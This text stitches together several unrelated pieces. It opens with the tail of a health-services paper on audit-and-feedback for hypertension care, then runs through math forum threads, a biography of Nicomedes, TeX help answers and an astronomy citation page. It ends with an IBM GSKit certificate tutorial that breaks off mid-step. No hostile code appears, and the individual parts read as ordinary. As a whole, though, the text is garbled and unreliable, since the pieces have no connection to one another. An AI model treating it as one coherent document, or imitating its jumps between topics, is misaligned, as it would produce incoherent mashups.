In this second case, we used FIT to design an A&F intervention to help physicians meet their goals for controlling patients' hypertension, as part of a randomised controlled trial of financial incentives to improve delivery of guideline-recommended hypertension care.26 ,27 Despite evidence that hypertension treatment is effective, the condition is undertreated by physicians and controlled in less than one-fourth of US citizens.28 Hypertension is a risk factor for stroke, coronary artery disease and congestive heart failure.
Although the intervention of interest in this hypertension study was financial incentives, A&F constituted an important component of the financial-incentive intervention, as it served as the principal tool for justifying the size of the incentive awarded to any recipient. Moreover, A&F served as the comparable activity for the control group. All participants (regardless of study arm) received A&F on their hypertension care; only the various financial-incentive configurations tested in the study differentiated the study arms. The details of the financial-incentive intervention have been published elsewhere;26 only the A&F design is discussed here.
### Participants
Eighty-three primary care physicians from 12 geographically dispersed VHA medical centres participated in this study. Additionally, non-physician clinicians (n=42) in trial groups receiving practice-based incentives (see below) also participated.
### Intervention
Over 20 months, participants received web-based A&F reports every 4 months. Each report presented participants with percentage scores for patients receiving hypertension therapy, patients meeting goal blood pressure (BP) levels during last visit and patients receiving hypertension therapy that also met goal BP levels during last visit. Percentage scores were given, both for patients the physician treated during each period and for patients treated by other physicians at the same clinic during that period (in aggregate). Additionally, suggested performance goals for the subsequent performance period were also included.
### Intervention design considerations
Several factors drove the design of this intervention. The nature of the task was an important consideration. FIT predicts that less complex tasks such as ordering guideline-recommended medication in the presence of consistently elevated BP29 are more susceptible to being positively influenced by feedback (see table 1); consequently, maintaining attention on the task and activating motivational processes (rather than trying to foster learning, as in the previous case) was a sufficient approach for this intervention. Practical matters also heavily influenced the design: this study involved hospitals geographically dispersed across the country, where often no prior relationship existed between the site and the research team. Target feedback recipients were busy primary care clinicians with little time to participate in a research study; in addition, feedback in this case was the control intervention, rather than the intervention of interest. Consequently, ease of delivery and minimal participant burden were key in this case—we sought to design feedback that could be deployed easily from a remote location, reviewed easily by participants and quickly show where gaps in their performance lay.
To accomplish our goal, we designed a web-based written report providing summary-based feedback. Each report depicted scores about each hypertension management aspect of interest; this provides some degree of correct-solution information by shifting attention to the specific aspect of hypertension management requiring most attention (eg, ordering new medication vs adjusting existing treatment). We also provided achievable goals for participants to strive towards for the following period, which work to activate recipients' motivational processes. Reports also contained group feedback and velocity information in the form of line graphs depicting individual and clinic score histories for hypertension treatment and meeting goal BP levels. Both velocity and group feedback cues improve feedback effectiveness by activating recipients' motivation processes and keeping attention focused on the task. Table 3 summarises how each feedback design characteristic was operationalised for the study. Appendix B presents an example of the feedback report used.
Table 3
Operationalisation of feedback characteristics for Case 2
### Results
#### Reactions to feedback
A random subset of 28 physicians were interviewed at the 16-month mark to gain more in-depth knowledge of their hypertension management experiences during the study. Among the topics discussed was the quality of feedback received and suggestions for improvement. Interview respondents reported finding the feedback reports useful, as they were more detailed and focused than the performance measure reports they normally receive as part of their regular work duties:31I think it [the RCT feedback report used in this study] is a more accurate reflection, I don't find the [VA-generated] facility reports very useful.—Physician, Site #9We get reports but it's buried amongst, like, ‘Do you look at the diabetic's foot’ or whatever. I can't say I've really scrutinized those either. Yours is more targeted.—Physician, Site #2
### Effectiveness of feedback intervention
Mean (SD) total payments over the study were US$4270 (US$459), US$2672 (US$153) and US$1648 (US$248) for the combined, individual and practice-level interventions, respectively. Relative to controls who received A&F alone, only the individual-incentives group exhibited significant changes in either BP control or appropriate response to uncontrolled BP. Change in guideline-recommended medication use was not significantly different than in the control group. The effect of the incentive was not sustained after a washout. However, we observed an average 11% increase (SD=2.87) in use of guideline-recommended antihypertensive medications between periods 1 and 5; this included the control group, who only received A&F reports.27
## Discussion
A&F has been a popular tool employed to change healthcare provider behaviour and improve healthcare quality; however, it has suffered from inconsistent, atheoretical implementation, leading to mixed levels of effectiveness.1 FIT provides a practical, evidence-based framework with which to design feedback interventions. We have presented two different real-world feedback interventions designed using the principles of FIT, both positively accepted by their intended recipients and demonstrating significant improvements in desired clinical behaviours in the presence of well-designed feedback.
In both cases, feedback was presented in writing, via computer, using a standardised structure whose content was individualised for each participant. In addition, Case 1 featured very specific correct solution information; whereas Case 2 featured individualised goal setting and norms. Correct solution information and goal setting are two of the most powerful feedback design features for maximising effectiveness,11 ,16 and in some cases their combined use is warranted. In these two cases, however, the designers' decision to use only one or the other feature, as well as the designers' respective selections, were driven by the context in which the A&F intervention was being used (consistent with the PARIHS framework) and by the features of the desired outcome. In Case 1, the desired outcome was correct diagnosis and subsequently appropriate treatment of ASB many possible decisions could have led to a wrong outcome; consequently, providing correct solution information about where the physician should have made a different choice was imperative. Conversely, in Case 2 the desired outcome was BP control and antihypertensive medication prescription; in this case the path to the correct outcome was far clearer and simpler; consequently, the more important design feature was to provide the motivational effect of goal setting to remind providers to carry out the desired outcome they already know they should. These findings demonstrate the need for considering both the desired outcome and feedback characteristics when designing a feedback intervention for maximum effect.
The two cases presented here covered two different healthcare scenarios; consequently, the A&F interventions featured rather different characteristics. So how do A&F designers decide which components to choose for their interventions? The commonalities between the two cases can prove instructive. Both cases selected components that were individually tailored to the feedback recipient (consistent with FIT and Hysong et al),32 and that directed attention to the details of the task, consistent with FIT. The nature of which components to use (eg, written/computerised feedback, correct solution information, goal setting), in both cases, was driven by the situational and organisational context. The role of context on feedback effectiveness is an area for which FIT does not provide much guidance and is a limitation of the theory. However, newer research and theories can be drawn upon to fill this gap and are excellent opportunities for future research.33 For example, depending on whether feedback recipients tend to be more performance versus mastery oriented, research suggests feedback should be customised to align with those recipient characteristics.34 Recent research has also recommended encouraging feedback-seeking behaviours from employees and focusing on creating a culture of feedback where employees feel safe at giving and receiving feedback and have opportunity for reflection; this can take the form of both formal and informal forms of feedback.34 ,35
## Limitations
The studies presented in the two cases, although guided by FIT to design a robust intervention that would be successful, were not designed for purposes of comparative effectiveness or to tease apart the effects of specific feedback elements; rather they were guided by FIT to design the intervention most likely to result in successful behaviour change, given the contextual constraints of the respective studies. Thus, the presentation of the two cases, while useful for presenting annotated examples of the design considerations for building successful, theory-based interventions using FIT, cannot speak to the matter of comparing the relative effectiveness of specific design elements of feedback.
The main limitation in our case presentation concerns limitations of the theory itself; FIT adopts an inherently cognitive perspective towards feedback; consequently, recipient motivations and contextual (situational) variables are outside the scope of the theory; additionally, because it adopts a cognitive perspective it is inherently individually based and does not address feedback in team contexts,36 as is the case with newer frameworks.37 Despite these limitations, newer research and theories (eg, DeShon et al37) have built upon the work of FIT precisely due to its clear and specific propositions and rationales; also, where the scenario lends itself to it, FIT can provide specific direction for designing A&F interventions, as it did with the two cases presented here.
## Conclusion
We conclude that FIT can be effectively used to design feedback interventions to more effectively improve provider performance and quality of healthcare. Future work should focus on expanding understanding of specific contextual cues that impact feedback effectiveness (whether for individuals or teams) to provide more specific guidance towards A&F intervention design.
## Footnotes
• Contributors SH conceived and wrote the first draft of the paper and designed the A&F interventions presented in each case. BWT was the principal investigator of the study presented in Case 1; LAP was the principal investigator of the study presented in Case 2. HJK aided in the design of Case 1's audit & feedback intervention and designed the ‘reactions to feedback’ component of Case 1; BAC edited subsequent drafts of the paper and provided material intellectual input. All authors provided critical intellectual input and material edits for the paper.
• Funding Veterans Administration, Health Services Research and Development Program (CDA 07-0181), (IIR 04-349) and (IIR 09-104); and National Heart Lung and Blood Institute (1R01HL079173-01), (R01HL079173-S2).
• Competing interests None declared.
• Ethics approval Institutional review boards for Baylor College of Medicine and Michael E. DeBakey VA Medical Center.
• Provenance and peer review Not commissioned; externally peer reviewed.
• i PARIHS—Promoting Action on Research Implementation in Health Services. |
1. ## Further Manipulation: Vectors
How was:
$\b{r} = \left(3\b{i}+1\b{j}-\frac72\b{k}\right)+s \left(8\b{i}-4\b{j}+5\b{k}\right)$
Manipulated to:
$\b{r} = \left(7\b{i}-1\b{j}-1\b{k}\right)+\lambda \left(8\b{i}-4\b{j}+5\b{k}\right)$
2. Originally Posted by Air
How was:
$\b{r} = \left(3\b{i}+1\b{j}-\frac72\b{k}\right)+s \left(8\b{i}-4\b{j}+5\b{k}\right)$
Manipulated to:
$\b{r} = \left(7\b{i}-1\b{j}-1\b{k}\right)+\lambda \left(8\b{i}-4\b{j}+5\b{k}\right)$
Make the replacement $s = \lambda + \frac{1}{2}$.
Since both $s$ and $\lambda$ are any real number, you get the same $\vec{r}$ using either one. |
# Nicomedes
### Quick Info
Born
Greece
Died
Summary
Nicomedes was a Greek mathematician famous for his treatise On conchoid lines which contains his discovery of the conchoid curve which he used to solve various mathematical problems, including the trisection of angles.
### Biography
We know nothing of Nicomedes' life. To make a guess at dating his life we have some limits which are given by references to his work. Nicomedes himself criticised the method that Eratosthenes used to duplicate the cube and we have made a reasonably accurate guess at Eratosthenes' life span (276 BC - 194 BC). A less certain piece of information comes from Apollonius choosing to name a curve 'sister of the conchoid' which is assumed to be a name he has chosen to compliment Nicomedes' discovery of the conchoid. Since Apollonius lived from about 262 BC to 190 BC these two pieces of information give a fairly accurate estimate of Nicomedes' dates. However, as we remarked the second of these pieces of information cannot be relied on but nevertheless, from what we know of the mathematics of Nicomedes, the deduced dates are fairly convincing.
Nicomedes is famous for his treatise On conchoid lines which contain his discovery of the curve known as the conchoid of Nicomedes. How did Nicomedes define the curve. Consider the diagram. We are given a line $XY$ and a point $A$ not on the line. $ABC$ is drawn perpendicular to $XY$ cutting it at $B$ and having the length $BC$ some fixed value, say $b$. Then rotate $ABC$ about $A$ so that, in an arbitrary position $ADE$ then $DE = b$. So if a point $P$ on the conchoid is joined to $A$ then $PA$ cuts the line $XY$ in a point at distance $b$ from $P$.
Nicomedes recognised three distinct forms in this family but the sources do not go into detail on this point. It is believed that they must be the three branches of the curve. The conchoid can be used in solving both the problems of trisection of an angle and of the duplication of a cube. Both these problems were solved by Nicomedes using the conchoid, in fact as Toomer writes in [1]:-
As far as is known, all applications of the conchoid made in antiquity were developed by Nicomedes himself. It was not until the late sixteenth century, when the works of Pappus and Eutocius describing the curve became generally known, that interest in it revived...
As indicated in this quote Pappus also wrote about Nicomedes, in particular he wrote about his solution to the problem of trisecting an angle (see for example [2]):-
Nicomedes trisected any rectilinear angle by means of the conchoidal curves, the construction, order and properties of which he handed down, being himself the discoverer of their peculiar character.
Nicomedes also used the quadratrix, discovered by Hippias, to solve the problem of squaring the circle. Pappus tells us (see for example [2]):-
For the squaring of the circle there was used by Dinostratus, Nicomedes and certain other later persons a certain curve which took its name from this property, for it is called by them square-forming
Eutocius tells us that Nicomedes [2]:-
... prided himself inordinately on his discovery of this curve, contrasting it with Eratosthenes' mechanism for finding any number of mean proportionals, to which he objected formally and at length on the ground that it was impracticable and entirely outside the spirit of geometry.
### References (show)
1. G J Toomer, Biography in Dictionary of Scientific Biography (New York 1970-1990). See THIS LINK.
2. T L Heath, A History of Greek Mathematics (2 Vols.) (Oxford, 1921).
3. G Loria, Le scienze esatte nell'antica Grecia (Milan, 1914), 404-410.
4. A Seidenberg, Remarks on Nicomedes' duplication, Arch. History Exact Sci. 3 (1966), 97-101. |
Tag Info
0
Since version 2.8.6, TeXstudio supports [txs-app-dir] and [txs-settings-dir] as part of the path definition of commands. In your case, something like this should do the trick: [txs-app-dir]\..\MikTexPortable\miktex\bin\pdflatex.exe Fur further details, see the manual.
1
There's always excel2latex; I'm not sure how well it works, but it's on CTAN. If this or some similar program doesn't work, and it is absolutely, positively not an option to recreate these tables in LaTeX, the best you'll probably be able to manage is convert them to an image and include them that way. It seems that there are some convoluted ways to do ...
1
To say it short: No. A little bit longer: If you want to have good looking tables you can find hints in several books over typography (for example the german book "Lesetypografie" or "Detailtypografie", I do not have english books, sorry) that for a good typography you should use empty place and no lines. Only to mark the header and the bottom of a table ...
1
Based on @Ignasi answer and the link he posted about using an editor with PdfLaTeX, the solution is as follows: From foolabs.com download xpdf and unpack to a location on your computer. In Computer Properties Go to Advanced system settings -> Environment Variables and add the path of your particular xpdfbin\bin to the path. This will enable Windows to find ...
0
Created C:\Local TeX Files. Put zipped fonts distribution in this directory and unzipped there. Click Start → Programs → MiKTeX 2.9 → Maintenance → Settings to open the MiKTeX Options window, Click on the Roots tab. The Roots page shows the list of currently registered root directories. Click Add. In the following dialog box , browse to C:\Local TeX Files ...
3
This is what externalize TikZ library does. Try to compile next code with command pdflatex --shell-escape levels (being levels the name of the file). As a result you'll get a pdf file with the whole document, but also another file called levels-figure0.pdf which contains the TikZ figure: In fact you'll get as many levels-figureXXX.pdf files as ...
0
The error message "Fatal format file error; I'm stymied" means that TeX binary is trying to load latex.fmt (or pdflatex.fmt) but the version of this TeX binary differs from another TeX binary which created such latex.fmt. There could be two reasons: you have installed two TeX binaries (in different versions) or you have somewhere in your computer the old ...
2
Hy A new version of Asymptote, v2.33, was released today. From the update A work around was implemented for the missing epswrite driver in ghostscript-9.15. So it seems that you can use Ghostscript >=9.15 and Asymptote 2.33 Old message : See Building with asymptote: file-2.tex not found, null surface and also Labels in 3D mode don't work in ...
0
It is a permission related to Windows 8. It is not necessary to make the user less secure. Right click on the application you need to run. From the context menu select "Run as Administrator." For instance if you are using TeXnicCenter for compiling your TeXt, right click on its shortcut you might have on desktop or Windows 8 apps style alternative and run it ...
2
Your template passes the option dvips to graphicx. But as you are using pdflatex (and not latex + dvips), you are lying to latex and so it doesn't look for the correct graphic type. Remove the option and hope that your template doesn't do more such silly things.
0
You can save your plot as a pdf file in mathematica; for example, "ttc.pdf". And then include it into your tex file \includegraphics[width=0.45\textwidth]{ttc.pdf}
-1
The answer is as @Sigur wrote: run (pdf)latex + bibtex + (pdf)latex + (pdf)latex [+ preview] In TeXmaker, this can be done using shortcuts F6 + F11 + F6 + F6 [+ F7].
1
Alexander's answer was the one got me going. The python.sty file from python.sty on github worked fine when I changed line 61 from: cat \@pythoninclude\space bin/\jobname.py | python > bin/\jobname.py.out 2> bin/\jobname.py.err to: python \jobname.py > \jobname.py.out 2> \jobname.py.err As you can see I also removed the bin folder. So I ...
1
There is a reference in newtx to newpx, it is in newtx.map: ntx-Italic-tlf-th-t1 ntxtmri " encntx-ecth-tlf ReEncodeFont " <[ntx-ecth-tlf.enc <ntxtmri.pfb ntx-Italic-osf-th-t1 ntxtmri " encntx-ecth-osf ReEncodeFont " <[ntx-ecth-osf.enc <ntxtmri.pfb
2
How did you compile your document.tex? I turns out, that some latex editors do not add the -shell-escape when compiling. If you do not have it (in the command line, or the latex editor of your choice) try using lualatex -shell-escape document.tex. For example, in TeXstudio or Texmaker the LuaLaTeX command has to be changed from lualatex -synctex=1 ...
0
Installing the newpx package seems to have helped. Both packages are by the same author, but there seems to be no reference to newpx in the newtx package. This probably qualifies as a bug report, will investigate. UPDATE: According to Michael Sharpe, the package author, this is an unwanted dependency which should be corrected soon.
4
MiKTeX is what is called a TeX distribution. It is not a single program that you start – it is a collection of programs and files necessary to start working with TeX. MiKTeX will likely have installed a program called "TeXworks". TeXworks is a very basic editor that makes it more comfortable to write TeX and LaTeX files (remembering that these are just ...
0
After MiKTeX, you have to install, GSView, Ghostscript and an editor (e.g., TeXStudio). At this point you have a complete LaTeX system.
Top 50 recent answers are included |
# How do I prove that: $\sum_{i=0}^{\infty} \frac{i^2}{i!}=2e$ [duplicate]
I've seen in Wolfram Alpha that $$\sum_{i=0}^{\infty} \frac{i^2}{i!}=2e$$ but I have no idea how to prove that.
Can anyone help me?
Thanks.
## marked as duplicate by Workaholic, Community♦Nov 30 '16 at 9:31
Consider $$S=\sum_{i=0}^{\infty} \frac{i^2}{i!}x^i=\sum_{i=0}^{\infty} \frac{i(i-1)+i}{i!}x^i=\sum_{i=0}^{\infty} \frac{i(i-1)}{i!}x^i+\sum_{i=0}^{\infty} \frac{i}{i!}x^i$$ $$S=x^2\sum_{i=0}^{\infty} \frac{i(i-1)}{i!}x^{i-2}+x\sum_{i=0}^{\infty} \frac{i}{i!}x^{i-1}$$ $$S=x^2\left(\sum_{i=0}^{\infty} \frac{x^i}{i!}\right)''+x\left(\sum_{i=0}^{\infty} \frac{x^i}{i!}\right)'=x^2e^x+xe^x$$ Now, use $x=1$.
Edit
Suppose that, instead of $i^2$, you faced $i^3$. It would be the same approach using $$i^3=i(i-1)(i-2)+3i(i-1)+i$$ Similarly $$i^4=i(i-1)(i-2)(i-3)+6i(i-1)(i-2)+7i(i-1)+i$$ Sooner or later, you will lear that $$S_k=\sum_{i=0}^{\infty} \frac{i^k}{i!}=B_k\, e$$ where appear Bell numbers. These grow extremely fast $(B_{20}=51724158235372)$.
\eqalign{\sum_{i=0}^\infty \dfrac{i^2 z^i}{i!} &= \sum_{i=0}^\infty z \dfrac{d}{dz} z \dfrac{d}{dz} \dfrac{z^i}{i!}\cr &= z \dfrac{d}{dz} z \dfrac{d}{dz} e^z\cr &= z (z+1) e^z}
Now substitute $z=1$.
The short way:
$$\sum_{i=0}^{\infty} \frac{i^2}{i!}=\sum_{i=1}^{\infty} \frac{i}{(i-1)!}=\sum_{i=0}^{\infty} \frac{i+1}{i!}=\sum_{i=1}^{\infty} \frac1{(i-1)!}+\sum_{i=0}^{\infty} \frac1{i!}=2\sum_{i=0}^{\infty} \frac1{i!}.$$ |
C, N, O abundances in the most metal-poor damped Lyman alpha systems★
@article{Pettini2008CNO,
title={C, N, O abundances in the most metal-poor damped Lyman alpha systems★},
author={Max Pettini and Berkeley J. Zych and Charles C. Steidel and Frederic H. Chaffee},
journal={Monthly Notices of the Royal Astronomical Society},
year={2008},
volume={385},
pages={2011-2024}
}
• M. Pettini, +1 author F. Chaffee
• Published 11 December 2007
• Physics
• Monthly Notices of the Royal Astronomical Society
This study focuses on some of the most metal-poor damped Lyα (DLA) absorbers known in the spectra of high-redshift QSOs, using new and archival observations obtained with ultraviolet-sensitive echelle spectrographs on the Keck and VLT telescopes. The weakness and simple velocity structure of the absorption lines in these systems allow us to measure the abundances of several elements, and in particular those of C, N and O, a group that is difficult to study in DLAs of more typical metallicities… Expand
132 Citations
Figures and Tables from this paper
The most metal-poor damped Lyα systems: insights into chemical evolution in the very metal-poor regime★
• Physics
• 2011
We present a high spectral resolution survey of the most metal-poor damped Lyα absorption systems (DLAs) aimed at probing the nature and nucleosynthesis of the earliest generations of stars. OurExpand
Implications of a non-universal IMF from C, N, and O abundances in very metal-poor Galactic stars and damped Lyα absorbers
• Physics
• 2011
Recently revealed C, N, and O abundances inthe most metal-poor damped Lyα(DLA) absorbers are compared withthose of extremely metal-poor stars in the Galactic halo, as well as extragalactic H IIExpand
The chemistry of the most metal-rich damped Lyman α systems at z ∼ 2 – II. Context with the Local Group
• Physics
• 2015
Using our sample of the most metal-rich damped Lyman $\alpha$ systems (DLAs) at z$\sim2$, and two literature compilations of chemical abundances in 341 DLAs and 2818 stars, we present an analysis ofExpand
THE MOST METAL-POOR DAMPED Lyα SYSTEMS: AN INSIGHT INTO DWARF GALAXIES AT HIGH-REDSHIFT
In this paper we analyze the kinematics, chemistry, and physical properties of a sample of the most metal-poor damped Ly? systems (DLAs), to uncover their links to modern-day galaxies. We presentExpand
The C/O ratio at low metallicity: constraints on early chemical evolution from observations of Galactic halo stars
• Physics
• 2009
Aims. We present new measurements of the abundances of carbon and oxygen derived from high-excitation C i and O i absorption lines in metal-poor halo stars, with the aim of clarifying the mainExpand
Discovery of the most metal-poor damped Lyman-α system
We report the discovery and analysis of the most metal-poor damped Lyman α (DLA) system currently known, based on observations made with the Keck HIRES spectrograph. The metal paucity of this systemExpand
Metallicity Evolution of Damped Lyman-alpha Systems out to z~5
• Physics
• 2012
We present chemical abundance measurements for 47 damped Lyman-alpha systems (DLAs), 30 at z>4, observed with the Echellette Spectrograph and Imager and the High Resolution Echelle Spectrometer onExpand
The First Observations of Low-redshift Damped Lyα Systems with the Cosmic Origins Spectrograph: Chemical Abundances and Affiliated Galaxies
We present Cosmic Origins Spectrograph (COS) measurements of metal abundances in eight 0.083 < zabs < 0.321 damped Lyman-α (DLA) and sub-damped Lyα absorption systems serendipitously discovered inExpand
A carbon-enhanced metal-poor damped Lyα system: probing gas from Population III nucleosynthesis?
• Physics
• 2010
We present high-resolution observations of an extremely metal-poor damped Lyα system (DLA), at z_(abs) = 2.340 0972 in the spectrum of the QSO J0035−0918, exhibiting an abundance pattern consistentExpand
Metal-enriched plasma in protogalactic halos. A survey of N V absorption in high-z damped and sub-da
We continue our recent work of characterizing the plasma content of high-redshift damped and sub-damped Lyman-α systems (DLAs/sub-DLAs), which represent multi-phase gaseous (proto)galactic disks andExpand
References
SHOWING 1-10 OF 69 REFERENCES
The abundances of nitrogen and oxygen in damped lyman alpha systems
We take a fresh look at the abundance of nitrogen in damped Lyman systems (DLAs) with oxygen abundances between1/10 and1/100 of solar. This is a metallicity regime poorly sampled in the localExpand
The Evolution of the C/O Ratio in Metal-poor Halo Stars
• Physics
• 2004
We report new measurements of carbon and oxygen abundances in 34 F and G dwarf and subgiant stars belonging to the halo population and spanning a range of metallicity from (Fe/H) = −0. 7t o−3.2 . TheExpand
On the Determination of N and O Abundances in Low Metallicity Systems
• Physics
• 2006
We show that in order to minimize the uncertainties in the N and O abundances of low-mass, low-metallicity (O/H ≤ 1/5 solar) emission-line galaxies, it is necessary to employ separateExpand
Element Abundances at High Redshifts: The N/O Ratio in a Primeval Galaxy
• Physics
• 1995
The damped Lyman alpha systems seen in the spectra of high redshift QSOs offer the means to determine element abundances in galaxies observed while still at an early stage of evolution. SuchExpand
A homogeneous sample of sub-damped Lyman systems – IV. Global metallicity evolution
An accurate method to measure the abundance of high-redshift galaxies involves the observation of absorbers along the line of sight towards a background quasar. Here, we present abundanceExpand
Metal abundances and ionization conditions in a possibly dust-free damped Ly-alpha system at z=2.3
We have obtained a high resolution, high S/N UVES spectrum of the bright QSO HE2243-6031 to analyze the damped Ly-alpha system (DLA) observed at z=2.33. The metallicity of this system is 1/12 solarExpand
A comprehensive set of elemental abundances in damped Lyα systems: Revealing the nature of these high-redshift galaxies
By combining our UVES-VLT spectra of a sample of four damped Lyα systems (DLAs) toward the quasars Q0100+13, Q1331+17, Q2231−00 and Q2343+12 with the existing HIRES-Keck spectra, we covered the totalExpand
First stars VI - Abundances of C, N, O, Li, and mixing in extremely metal-poor giants. Galactic evolution of the light elements
We have investigated the poorly-understood origin of nitrogen in the early Galaxy by determining N abundances from the NH band at 336 nm in 35 extremely metal-poor halo giants, with carbon and oxygenExpand
A homogeneous sample of sub-damped Lyman α systems- I. Construction of the sample and chemical abundance measurements
In this first paper of a series, we report on the use of quasar spectra obtained with the high-resolution Ultraviolet-Visual Echelle Spectrograph (UVES) and available through the European SouthernExpand
Early stages of Nitrogen enrichment in galaxies: Clues from measurements in damped Lyman alpha systems
• Physics
• 2003
We present 4 new measurements of nitrogen abundances and one upper limit in damped Ly α absorbers (DLAs) obtained by means of high resolution (FWHM � 7k m s −1 ) UVES/VLT spectra. In addition toExpand |
# Managing certificates with IBM GSKit
An easy guide to creating, signing, installing, and using certificates with IBM Global Security Kit
This tutorial explains how to set up and use IBM Global Security Kit (GSKit) for typical certificate management tasks such as self-signed certificate generation, creation of a Certificate Authority (CA), requesting a certificate from a third-party CA, and installing certificates for use in SSL protocols.
Share:
Alexei Kojenov (kojenova@us.ibm.com), Advisory Software Engineer, IBM China
Alexei Kojenov has been a member of the Tivoli Storage Manager (TSM) development team since 2000. In the last several years, his primary focus has been on the security features of the product. He participated in implementation of AES encryption and SSL support in TSM using GSKit. He has extensive knowledge of secure programming and other security practices. He is also the lead Linux developer for TSM client.
06 November 2012
## Before you start
This tutorial describes how to use IBM GSKit and OpenSSL tools for common certificate management tasks. It is not a general tutorial on public key cryptography, X.509 certificates, or SSL/TLS.
IBM Global Security Kit (GSKit) is a common component that is used by a number of IBM products for its cryptographic and SSL/TLS capabilities. While each product provides some minimal documentation on how to use GSKit, this tutorial provides a comprehensive, product neutral tutorial on how to perform common certificate management tasks.
The tasks in this tutorial are described with a command-line approach to ensure they can be incorporated into automation scripts.
### Objectives
In this tutorial, you learn how to locate and set up the GSKit command-line utility, how to create different kinds of digital certificates, how to set up your own Certificate Authority and sign certificates, as well as how to install, use, and switch between certificates.
### Prerequisites
This tutorial is written for system administrators, security specialists, and developers who use IBM products containing GSKit.
### System requirements
You need an IBM product that includes GSKit version 7 or 8. You generally do not need administrative or root access to the system unless you need to install optional OpenSSL software. However, you need read and write access to the certificate key database of your product, which can require administrative or root privileges.
## Overview
### IBM Global Security Kit
IBM Global Security Kit (GSKit) is a library and set of command-line tools that provides SSL implementation along with base cryptographic functions (symmetric and asymmetric ciphers, random number generation, hashing, and so on) and key management.
The underlying cryptographic library, IBM Crypto for C (ICC), is FIPS certified.
GSKit is used by many IBM software products for its security, usability, and FIPS certification. Some products expose and even require a user to use GSKit utilities for certain tasks, while others wrap GSKit's capabilities in their own interfaces.
#### GSKit availability
GSKit is a component and not a stand-alone product. It is not obtainable independent of the products that ship it. GSKit support and updates are provided as part of other products' support and updates.
## Setup
### Understanding GSKit installation methods and versions
GSKit supports two installation methods: global and local. Both types of installations may be present on a system at the same time.
• On a global installation, a single GSKit instance is shared by multiple products. In this configuration, GSKit libraries and executable files are placed in a common location on the system outside of the product's installation directory. If more than one product uses the same GSKit version, these products will not create multiple copies of GSKit, but instead share the single global copy.
• On a local installation, each product has its own, private version of GSKit. In this configuration, GSKit files are placed somewhere within the product's directory structure and their location may or may not be documented. If a global installation exists on the system, it is ignored by the product, which uses only its local installation of GSKit.
Different major versions of GSKit (for example, version 7 and version 8) are separate and can coexist as global installations.
This tutorial discusses GSKit versions 7 and 8 only, not any prior versions. All examples are given for GSKit 8. Unless noted otherwise, the same commands and options that are provided in the examples also work in version 7.
### Finding GSKit on your system
The GSKit command-line tool is named as follows:
gsk<version>capicmd[_64]
where <version> is the GSKit major version (either 7 or 8). The _64 suffix is added on 64-bit platforms. For simplicity, this tutorial omits the suffix, and uses gsk8capicmd in the examples.
To locate the GSKit installation on your system:
1. Read the product documentation for any guidance on locating and running GSKit. Usually, if a product requires running the GSKit command-line tool, it also documents its location. Some products may provide their own wrapper scripts that set the correct GSKit environment and pass the arguments to the correct instance of GSKit command-line tool. If this is the case, skip the rest of this section and the next section, "Configuring the environment to run GSKit", and use the script name instead of gsk8capicmd.
2. Determine if there is a global installation of GSKit:
• On UNIX or Linux®, enter one of the following commands, gsk7capicmd or gsk8capicmd, on the command line. If anything other than an error message is returned, GSKit is installed and ready to use.
• On Windows®, open Registry Editor and look for one of the following keys:
HKEY_LOCAL_MACHINE\SOFTWARE\IBM\gsk8\CurrentVersion\InstallPath
or
HKEY_LOCAL_MACHINE\SOFTWARE\IBM\gsk7\CurrentVersion\InstallPath
These keys indicate where GSKit is installed.
3. You can search the product's installation directories or the entire file system/disk for files and directories containing "gsk." There are two subdirectories, lib and bin, containing GSKit shared libraries and binaries.
### Configuring the environment to run GSKit
The process to configure your environment to run GSKit varies depending on the type of platform you are using.
#### UNIX and Linux
For global installations of GSKit, no configuration is needed. The command-line tool is already on the executable path, and the libraries are in their standard system location. The GSKit commands can be run from any terminal window.
For local installations of GSKit, add its shared libraries directory to your environment:
export <Shared library path environment variable>=<GSKit library path>
#### Windows
Add both library and binary paths to the PATH environment variable. You can do this either in a command-line window for a single session, or change the global settings. To add the paths using a command line, type:
set PATH=C:\path\to\IBM\gsk7\bin;C:\path\to\IBM\gsk7\lib;%PATH%
### Installing OpenSSL
Some tasks in this tutorial use OpenSSL. See Resources for instructions on obtaining OpenSSL, and follow the OpenSSL instructions for installing it on your system.
### Preparing a key database
GSKit stores public and private keys and certificates in a key database. A key database consists of a file with a .kdb extension and up to three other files with .sth, .rdb, and .crl extensions.
Your product may have already created a key database. If so, look at the product documentation to find its location. If you don't already have a key database, you need to create and initialize a new one.
To create and initialize a new key database, run the following command (depending on your version):
• Version 7:
gsk7capicmd -keydb -create -db <filename>.kdb -pw <password> -stash
• Version 8:
gsk8capicmd -keydb -create -populate -db <filename>.kdb -pw <password> -stash
The -db parameter indicates the file name for the new key database. The -pw parameter indicates the password to use to protect the key database file. The -populate parameter in version 8 is optional and tells GSKit to populate the key database with a number of predefined trusted CA certificates. Version 7 always populates the new key database with the predefined trusted CA certificates. The -stash parameter tells GSKit to save the specified key database password locally in the .sth file so that it doesn't have to be entered on the command line in the future.
In the example scenarios in this tutorial, the following key database names are used:
• server.kdb: Server key database
• client.kdb: Client key database
• ca.kdb: Certificate Authority key database
## Managing self-signed certificates
### Creating a self-signed certificate
A self-signed certificate consists of a public/private key pair and a certificate for the public key that is signed by the private key. It is also known as a "root" certificate because it can be used to create a Certificate Authority.
Self-signed certificates can also be used in simple scenarios when both the client and the server are known to each other and can exchange certificates securely out-of-band.
To generate a self-signed certificate and store it in the key database, use the following command:
gsk8capicmd -cert -create -db server.kdb -stashed -dn "CN=myserver,OU=mynetwork,O=mycompany,C=mycountry" -expire 7300 -label "My self-signed certificate" -default_cert yes
The -db parameter specifies the key database where the self-signed certificate should be stored. The -dn parameter specifies the distinguished name to use on the public key certificate. The -expire parameter indicates the number of days the certificate is valid. The -label parameter is a name to use for the self-signed certificate within the key database. The -default_cert parameter makes the newly created certificate the default and is an optional parameter.
### Installing the certificate on client systems
For the clients to trust a certificate, its public part needs to be distributed to the clients and stored in their key databases. The process for doing this is:
1. Extract the public part to a file using the following command:
gsk8capicmd -cert -extract -db server.kdb -stashed -label "My self-signed certificate" -format ascii -target mycert.arm
The -db parameter specifies the server key database that contains the certificate to be shared with clients. The -label parameter specifies the certificate's label within the key database. The -target parameter specifies the file name where the exported certificate should be stored.
2. Distribute mycert.arm to the clients.
3. Add the new certificate to the clients' key database as follows:
gsk8capicmd -cert -add -db client.kdb -stashed -label "Server self-signed certificate" -file mycert.arm -format ascii -trust enable
The -db parameter specifies the name of the client's key database file. The -label parameter specifies the label to be used for the certificate inside the key database file. The -file parameter specifies the file containing the certificate to be imported.
## Creating a Certificate Authority (CA)
### Creating a CA using GSKit
1. Initialize the CA key database and create the CA certificate. For example:
